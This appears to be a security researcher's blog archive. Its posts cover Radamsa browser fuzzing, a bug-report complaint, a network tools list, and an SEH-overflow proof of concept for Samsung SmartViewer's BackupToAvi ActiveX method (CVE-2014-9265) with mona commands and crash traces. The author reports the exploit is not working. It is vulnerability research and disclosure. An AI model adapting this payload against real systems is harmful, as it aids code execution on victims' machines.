Wednesday, January 28, 2015

Generate sample fuzz files using Radamsa Fuzzer

Radamsa is a general purpose data fuzzer, reads data from given sample files and outputs modified data usually malformed.

Below command takes html files as input and generates infinite output  malformed html files (press Ctrl + C to stop generation of files). "-n 100000" will generate one lakh malformed html files.

$radamsa -o gen_htmls/test_browser_%n.html -n inf -r ../poc_html_files/*.html -M -

-o        specify where to write the modified data.
%n      represents test case number
-n        how  many outputs to generate based on the sample(s). -1 or inf generates infinite output
-M -    write metadata about generated data to given path, - indicates stdout

"-M -" generates below metadata of generated output file
xp-repeat: 3, xp-dup: 1, xp-insert: 1, xp-swap: 1, muta-num: 1, source: "../poc_html_files/sample1.html", generator: file, nth: 31812, path: "gen_htmls/test_browser_31812.html", output: file-writer, length: 1622, pattern: burst
xp-repeat: 4, xp-dup: 2, xp-insert: 4, fuse-old: 1, muta-num: 4, source: "../poc_html_files/sample2.html", generator: file, nth: 31813, path: "gen_htmls/test_browser_31813.html", output: file-writer, length: 2515, pattern: many-dec
xp-repeat: 1, xp-pump: 1, xp-dup: 1, xp-insert: 5, muta-num: 1, source: "../poc_html_files/sample3.html", generator: file, nth: 31814, path: "gen_htmls/test_browser_31814.html", output: file-writer, length: 14832, pattern: burst

praveend@praveend-VirtualBox:~/radamsa-0.4/bin/gen_htmls$
$ ls -t |more
test_browser_31816.html
test_browser_31814.html
test_browser_31815.html
test_browser_31813.html
test_browser_31812.html
test_browser_31811.html
test_browser_31810.html
test_browser_31808.html
test_browser_31809.html
test_browser_31807.html
test_browser_31806.html

$radamsa -o :8080 -r gen_htmls/

Above command will open port 8080 and bings to all IP Addresses if the machine is multi homed.
When a client connects to 8080 radamsa serves malicious files.

We can also use NodeFuzz to server malicious HTML files, but nodefuxx allows mentioning only one HTML file part of configuration. Not sure how to respond back with all malicious files one by one when a client browser connects.
$ node nodefuzz.js

Enjoy Fuzzing!

Sunday, January 18, 2015

Hilarious reply from Kotak in response to reported Security Bugs

There are few security issues on Kotak Securities web site, informed my findings to the folks at Kotak but got a surprising response.

This tells how serious Kotak is against their customers data.

Below is the mail I got in response to reported security bugs.




Samsung SmartViewer BackupToAvi Remote Code Execution PoC (CVE-2014-9265)

This blog is about CVE-2014-9265.
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265

What Samsung says about the software
"SmartViewer is DVR management software that enables you to connect to and control a remote Samsung DVR on your PC via the network. With this tool, you can access Samsung DVRs anywhere around the world via the network, and check the video data from the connected cameras. You can also search for and play recording data in the DVR on a remote site, which will be an effective and convenient monitoring system."

Lets load single vulnerable DLL , C:\Program Files\Samsung\SmartViewer3.0\Bin\CNC_Ctrl_STW.dll into ImmunityDBG.

mona plugins help can be viewed with below command
!mona 
           modules / mod        | Show all loaded modules and their properties
           unicodealign / ua    | Generate venetian alignment code for unicode stack buffer overflow
Displays the list of all the loaded modules and their properties (ASLR, SafeSEH etc).
!mona modules
0BADF00D   ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D    Module info :
0BADF00D   ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D    Base       | Top        | Size       | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path
0BADF00D   ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D    0x774d0000 | 0x7754b000 | 0x0007b000 | True   | True    | True  |  True    | True   | 6.1.7600.16385 [COMDLG32.dll](C:\Windows\system32\COMDLG32.dll)
0BADF00D    0x10000000 | 0x1017b000 | 0x0017b000 | False  | False   | False |  False   | False  | 2.0.1.6 [CNC_Ctrl_STW.dll] (C:\Program Files\Samsung\SmartViewer3.0\Bin\CNC_Ctrl_STW.dll)
0BADF00D    0x75c60000 | 0x75d34000 | 0x000d4000 | True   | True    | True  |  True    | True   | 6.1.7600.16385 [kernel32.dll] (C:\Windows\system32\kernel32.dll)

!mona ua
will generate venetian_alignment.txt at C:\Program Files\Immunity Inc\Immunity Debugger\

mona command to search for addresses with pop/pop/ret
!mona findwild -s "pop r32#*#pop r32#*#retn"
Above command  will generate findwild.txt file located at
C:\Program Files\Immunity Inc\Immunity Debugger\

Only one address(shown below) which has unicode compatibility is useful to us.
0x10008700 : pop ecx # mov eax,esi # pop esi # retn 4 | null,unicodereverse {PAGE_EXECUTE_READ} [CNC_Ctrl_STW.dll] ASLR: False, Rebase: False, SafeSEH:
False, OS: False, v2.0.1.6 (C:\Program Files\Samsung\SmartViewer3.0\Bin\CNC_Ctrl_STW.dll)

Conditional breakpoint can be set using, assuming EIP holds 0x10008700 though EIP is having 0x00100087
bp 10008700 "j @eip=0x10008700 ; 'g' " 

Finding offset to EIP
Initially pass a character string of length 15000 to BackupToAvi API, use Metasploit cyclic pattern to find the offset where EIP is overwritten, in my case it is offset 156. To find offset execute !exchain", search for the characters located at address 0x045ad62c, im metasploit cyclic pattern to get the offset.

Once we know the offset to seh, nseh we can write a PoC as shown below
<html>
<head> Samsung SmartViewer BackupToAvi Remote Code Execution</head>
<title> PoC developed by Praveen Darshanam </title>
<object classid='clsid:208650B1-3CA1-4406-926D-45F2DBB9C299' id='target' >
</object>

<script >
 var payload_length = 15000;
 var arg1=1;
 var arg2=1;
 var arg3=1;
 //blank strings
 var junk = "";
 var buf1 = "";
 var buf2 = "";

 //offset to SE is 156, initial analysis using metasploit cyclic pattern
 for (i=0; i<156; i++)
 {
  buf1 += "A";
 }

 var nseh = "DD";
//vulnerable DLL
var seh = "\x87\x10"; //pop, pop, ret junk = buf1 + nseh + seh; //remaining buffer for (j=0; j<(payload_length-junk.length); j++) { buf2 += "B"; } var fbuff = junk + buf2; target.BackupToAvi(arg1 ,arg2 ,arg3 ,fbuff); </script> </html>
When we open above html file in browser, we get below trace
Tested on Windows 7 Ultimate N SP1 using Internet Explorer 8)

(c6c.418): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=00450045 edx=773771cd esi=00000000 edi=00000000
eip=00450045 esp=043b10a8 ebp=043b10c8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
00450045 ??              ???

0:005> !exchain
....
045abacc: ntdll!ExecuteHandler2+3a (773771cd)
045abeb4: ntdll!ExecuteHandler2+3a (773771cd)
045ac29c: ntdll!ExecuteHandler2+3a (773771cd)
045ac684: ntdll!ExecuteHandler2+3a (773771cd)
045ad62c: 00450045
Invalid exception stack at 00440044

0:005> d 045ad62c
045ad62c  44 00 44 00 45 00 45 00-42 00 42 00 42 00 42 00  D.D.E.E.B.B.B.B.
045ad63c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
045ad64c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
045ad65c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
045ad66c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
045ad67c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
045ad68c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
045ad69c  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.

Couldn't write working exploit because of the issues mentioned below.
Issue1:
None of the registers are pointing to controlled buffer at the time of crash, can be verified using "d reg_name" on windbg cli where reg_name might be eax, ebx, esp, edi etc.

var nseh = "DD";
var seh = "\x87\x10";      //0x10008700
045ad62c  44 00 44 00 87 00 10 00-42 00 42 00 42 00 42 00 D.D.....B.B.B.B.

Issue2:
0x10008700 points to pop/pop/ret but eip is getting 0x00100087 instead of 0x10008700

Facing issue 2 on Windows XP Pro SP3 also
0:008> !exchain
020bf798: 00100087
Invalid exception stack at 00440044
0:008> d 020bf798
020bf798  44 00 44 00 87 00 10 00-42 00 42 00 42 00 42 00  D.D.....B.B.B.B.
020bf7a8  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
020bf7b8  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
020bf7c8  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
020bf7d8  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
020bf7e8  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
020bf7f8  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
020bf808  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.

Any hints to develop working exploit are most welcome!

Monday, January 12, 2015

Netwrok Security Testing for Absolute Beginners


This blog covers some tools for Network/Security Testing.

Packet Crafting - hping, ngrep, sendip, scapy
Packet Replay - tcpreplay,tcpreplay-edit,tcpdump
Scanning - nmap,nc, metasploit,nessus
Fuzzing - metasploit, nikto,nessus, spike,radamsa,webfuzz
Stats - dstat,ifstat,iftop,ntop
Web - wget, curl, ab
Debugging - ping,netstat,tracert, ngrep
Benchmarking - ab,iperf,netperf
SNMP - snmpwalk
NTP Suite

For CLI one liners refer below presentation
http://disects.com/whitepapers/NetworkSecurityTestingTools.pdf